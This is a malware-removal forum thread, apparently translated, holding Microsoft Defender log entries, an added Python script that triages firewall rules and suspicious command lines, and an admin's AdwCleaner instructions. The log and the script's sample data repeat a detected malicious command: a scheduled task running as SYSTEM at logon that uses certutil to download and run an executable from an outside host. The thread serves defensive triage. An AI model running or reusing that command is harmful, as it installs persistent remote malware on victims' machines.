Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Security intelligence Version: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Engine Version: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:45:43.8350000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Security intelligence Version: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Engine Version: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:42:01.0060000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Security intelligence Version: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Engine Version: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 21:27:56.0780000Z
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New Security intelligence Version:
Previous Security intelligence Version: 1.325.1105.0
Update Source: Microsoft Malware Protection Center
Security intelligence Type: Antivirus
Update Type: Full
User: NT AUTHORITY\NETWORK SERVICE
Current Engine Version:
Previous Engine Version: 1.1.17500.4
Error code: 0x80072742
Error description: A socket operation encountered a dead network.
Date: 2020-10-20 21:27:56.0750000Z
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New Security intelligence Version:
Previous Security intelligence Version: 1.325.1105.0
Update Source: Microsoft Malware Protection Center
Security intelligence Type: Antispyware
Update Type: Full
User: NT AUTHORITY\NETWORK SERVICE
Current Engine Version:
Previous Engine Version: 1.1.17500.4
Error code: 0x80072742
Error description: A socket operation encountered a dead network.
Date: 2020-10-20 21:27:56.0740000Z
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New Security intelligence Version:
Previous Security intelligence Version: 1.325.1105.0
Update Source: Microsoft Malware Protection Center
Security intelligence Type: Antivirus
Update Type: Full
User: NT AUTHORITY\NETWORK SERVICE
Current Engine Version:
Previous Engine Version: 1.1.17500.4
Error code: 0x80072742
Error description: A socket operation encountered a dead network.
Date: 2020-10-20 21:27:56.0390000Z
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New Security intelligence Version:
Previous Security intelligence Version: 1.325.1105.0
Update Source: Microsoft Malware Protection Center
Security intelligence Type: Antivirus
Update Type: Full
User: NT AUTHORITY\NETWORK SERVICE
Current Engine Version:
Previous Engine Version: 1.1.17500.4
Error code: 0x80072742
Error description: A socket operation encountered a dead network.
Date: 2020-10-20 21:27:56.0360000Z
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New Security intelligence Version:
Previous Security intelligence Version: 1.325.1105.0
Update Source: Microsoft Malware Protection Center
Security intelligence Type: Antispyware
Update Type: Full
User: NT AUTHORITY\NETWORK SERVICE
Current Engine Version:
Previous Engine Version: 1.1.17500.4
Error code: 0x80072742
Error description: A socket operation encountered a dead network.
==================== Memory info ===========================
BIOS: American Megatrends Inc. 0308 07/10/2007
Motherboard: ASUSTeK Computer INC. M2N-MX SE
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4200+
Percentage of memory in use: 38%
Total physical RAM: 3071.36 MB
Available physical RAM: 1887.16 MB
Total Virtual: 6271.36 MB
Available Virtual: 5348.71 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.32 GB) (Free:298.64 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (KINGSTON) (Removable) (Total:14.44 GB) (Free:13.07 GB) FAT32
\\?\Volume{44cc5245-0000-0000-0000-a05474000000}\ () (Fixed) (Total:0.44 GB) (Free:0.1 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 44CC5245)
Partition 1: (Active) - (Size=465.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=449 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 14.5 GB) (Disk ID: 0D702AAC)
Partition 1: (Not Active) - (Size=14.5 GB) - (Type=0B)
==================== End of Addition.txt =======================
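The two parts of this Addition.txt that matter for triage are the Defender events (a scheduled task created with /SC ONLOGON /RU SYSTEM whose action uses certutil.exe -urlcache to fetch a payload into %TEMP%\csrss\) and the Windows Firewall Allow rules for unsigned binaries: one under AppData\Roaming\16f618eaf6a0\ and a csrss.exe in C:\WINDOWS\rss\ rather than System32. The Python below is an added example, not part of the original post and not FRST's own logic, showing how a responder can pull exactly those two artefact types out of the raw log lines mechanically. The sample lines are copied in form from the log above; the trusted-directory list, the set of binary names that only legitimately run from System32, and the %TEMP% heuristic are assumptions of this example.

```python
"""Triage of two artefact types from an FRST Addition.txt log: Windows Firewall
'Allow' rules and a Defender-reported schtasks/certutil command line."""
import re

# Constructed sample input: five lines copied in form from the log above.
SAMPLE_LINES = [
    r"FirewallRules: [{93C34D1D-8364-41F3-844F-1694693AB6AF}] => (Allow) C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe () [File not signed]",
    r"FirewallRules: [{96DC6731-E2CF-4F11-BC78-0A40F04761A0}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]",
    r"FirewallRules: [{103F7BC9-F0D2-47F2-AE12-488E8CCB3AE5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)",
    r"FirewallRules: [TCP Query User{71C01058-FA98-4143-BD85-58F8754636AD}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]",
    r"Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F",
]

# Assumptions of this example (not FRST logic): where benign software normally
# lives, and core binaries that only legitimately run from System32.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
SYSTEM32_ONLY = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
                 "services.exe", "lsass.exe", "svchost.exe"}
CMDLINE_PREFIX = "CmdLine:_"

FW_RE = re.compile(
    r"^FirewallRules: \[(?P<rule>[^\]]+)\] => \((?P<action>Allow|Block)\) "
    r"(?P<path>[A-Za-z]:\\.+?\.exe)(?P<rest>.*)$",
    re.IGNORECASE,
)


def parse_firewall_rule(line):
    """Split one FRST FirewallRules line into its fields, or None if not one."""
    m = FW_RE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    signer = re.search(r"\(([^)]*)\)", rest)
    return {
        "rule": m.group("rule"),
        "action": m.group("action"),
        "path": m.group("path"),
        "signer": signer.group(1).strip() if signer else "",
        "unsigned": "[file not signed]" in rest.lower(),
        "missing": "=> no file" in rest.lower(),
    }


def firewall_findings(rule):
    """Reasons an Allow rule deserves a second look (empty list = nothing odd)."""
    reasons = []
    if rule["action"].lower() != "allow":
        return reasons  # a Block rule grants nothing
    path = rule["path"].lower()
    name = path.rsplit("\\", 1)[-1]
    if rule["unsigned"]:
        reasons.append("unsigned binary")
    if not path.startswith(TRUSTED_DIRS):
        reasons.append("outside Program Files / Windows")
    if name in SYSTEM32_ONLY and not path.startswith("c:\\windows\\system32\\"):
        reasons.append(f"{name} outside System32 (name masquerade)")
    return reasons


def analyse_cmdline(cmd):
    """Flag the persistence and download tricks in a schtasks command line."""
    if CMDLINE_PREFIX in cmd:
        cmd = cmd.split(CMDLINE_PREFIX, 1)[1]
    low = cmd.lower()
    flags = []
    if "schtasks" in low and "/create" in low:
        flags.append("scheduled task created")
        if re.search(r"/ru\s+system\b", low):
            flags.append("runs as SYSTEM")
        if re.search(r"/sc\s+onlogon\b", low):
            flags.append("triggers at every logon")
        if re.search(r"/rl\s+highest\b", low):
            flags.append("highest run level")
    if re.search(r"certutil(\.exe)?\s+-urlcache", low):
        flags.append("certutil used as downloader (LOLBin)")
    if "\\appdata\\local\\temp\\" in low:
        flags.append("payload staged under %TEMP%")
    task = re.search(r"/tn\s+(\S+)", cmd, re.IGNORECASE)
    return {
        "flags": flags,
        "urls": re.findall(r"https?://\S+", cmd),
        "task_name": task.group(1) if task else None,
    }


def triage(lines):
    """Run both checks over raw log lines; returns (subject, findings) pairs."""
    report = []
    for line in lines:
        rule = parse_firewall_rule(line)
        if rule:
            reasons = firewall_findings(rule)
            if reasons:
                report.append((rule["path"], reasons))
        elif CMDLINE_PREFIX in line:
            verdict = analyse_cmdline(line)
            report.append(("cmdline:" + (verdict["task_name"] or "?"), verdict["flags"]))
    return report


if __name__ == "__main__":
    for subject, findings in triage(SAMPLE_LINES):
        print(subject)
        for f in findings:
            print("   -", f)
```

Run against the sample lines it reports the AppData binary (unsigned, outside the trusted directories), the csrss.exe under C:\WINDOWS\rss\ (unsigned, name masquerade) and the ScheduledUpdate task with all of its flags, while the signed Chrome Allow rule and the uTorrent Block rule produce nothing. Feed it the whole Addition.txt and the same functions apply unchanged; the lists of trusted directories and System32-only names are the knobs to tune.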
Rudy (Site Admin; posts: 119418; registered: 30 Oct 2003 13:42; location: Plzeň)
Re: please check my rsit log
OK. Now run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/
close all programs
accept the licence terms (EULA) by clicking I agree
right-click the AdwCleaner icon and choose Run as administrator (on Win XP just double-click it)
click Scan now, then Clean and Repair
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.
Please support our forum: https://platba.viry.cz/payment/.
Visit:
e-mail: rudy(at)forum.viry.cz
Warning: Before cleaning your PC, back up your important data (mail, contacts, documents, photos, videos, music etc.). Besides its "visible" activity, a virus can damage the system!
Once your problem is solved the thread will be locked, and likewise if it stays inactive for more than 14 days. If you want the thread reopened, write to the e-mail given above.